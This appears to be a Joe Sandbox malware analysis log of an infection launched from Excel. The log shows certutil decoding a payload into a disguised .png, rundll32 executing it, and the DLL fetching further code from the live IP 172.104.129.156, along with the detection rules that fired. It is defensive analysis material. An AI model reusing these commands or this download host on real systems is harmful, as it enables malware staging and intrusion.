Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, ProcessId: 3704 |
Source: Process started | Author: Florian Roth, juju4, keepwatch: Data: Command: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, ProcessId: 1488 |
Source: C:\Users\Public\94101.png | ReversingLabs: Detection: 35% |
Source: unknown | HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2 |
Source: global traffic | DNS query: name: yahoo.com |
Source: global traffic | TCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443 |
Source: global traffic | TCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80 |
Source: Joe Sandbox View | IP Address: 87.248.100.215 |
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic | HTTP traffic detected: GET /campo/o/o HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 172.104.129.156 Connection: Keep-Alive |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA, | 6_2_10001000 |
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: <img src="https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&cv=2.0&cj=1&c14=-1" /> equals www.yahoo.com (Yahoo) |
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: _comscore.push({"c1":"2","c2":"7241469","c5":"2023538075","c7":"https:\/\/www.yahoo.com\/","c14":-1}); equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: <meta property="og:url" content="http://www.yahoo.com" /> equals www.yahoo.com (Yahoo) |